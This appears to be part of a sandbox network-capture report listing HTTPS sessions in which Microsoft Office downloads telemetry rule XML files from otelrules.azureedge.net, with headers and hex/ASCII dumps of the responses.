                                                                                                                                                                                                2024-11-23 15:54:50 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                127192.168.2.44996113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:51 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:52 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                x-ms-request-id: ff0b0d52-c01e-002b-2681-3b6e00000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155452Z-174c587ffdfgcs66hC1TEB69cs000000032g000000003q4y
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:52 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                128192.168.2.44996313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:52 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:53 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:52 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                x-ms-request-id: 7b3b97af-701e-003e-795c-3d79b3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155452Z-15b8b599d889gj5whC1TEBfyk000000002yg00000000c3s3
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                129192.168.2.44996213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:52 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:52 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                x-ms-request-id: 18ec886b-801e-0078-7044-3cbac6000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155452Z-178bfbc474bpnd5vhC1NYC4vr400000004sg000000001zqe
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:53 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                130192.168.2.44996513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:52 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:53 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155453Z-174c587ffdfldtt2hC1TEBwv9c00000002x000000000kn71
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:53 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                131192.168.2.44996413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:52 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:53 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:53 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                x-ms-request-id: 26bf21ad-f01e-001f-285c-3d5dc8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155453Z-15b8b599d88hd9g7hC1TEBp75c0000000370000000001fqs
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                132192.168.2.44996613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:54 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:54 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                x-ms-request-id: e8d3758b-d01e-0066-2757-3cea17000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155454Z-15b8b599d88pxmdghC1TEBux9c00000003cg0000000002ca
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                133192.168.2.44996813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:55 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:55 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                x-ms-request-id: 3b38473f-101e-007a-2bbc-3b047e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155455Z-15b8b599d88phfhnhC1TEBr51n000000037g00000000d03k
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:55 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                134192.168.2.44996713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:55 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:55 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                x-ms-request-id: 1eb9d342-301e-005d-4e03-3de448000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155455Z-178bfbc474b9fdhphC1NYCac0n00000004n000000000889v
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:55 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                135192.168.2.44997013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:55 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:55 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1425
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155455Z-178bfbc474bp8mkvhC1NYCzqnn00000004h00000000084a2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:55 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                136192.168.2.44996913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
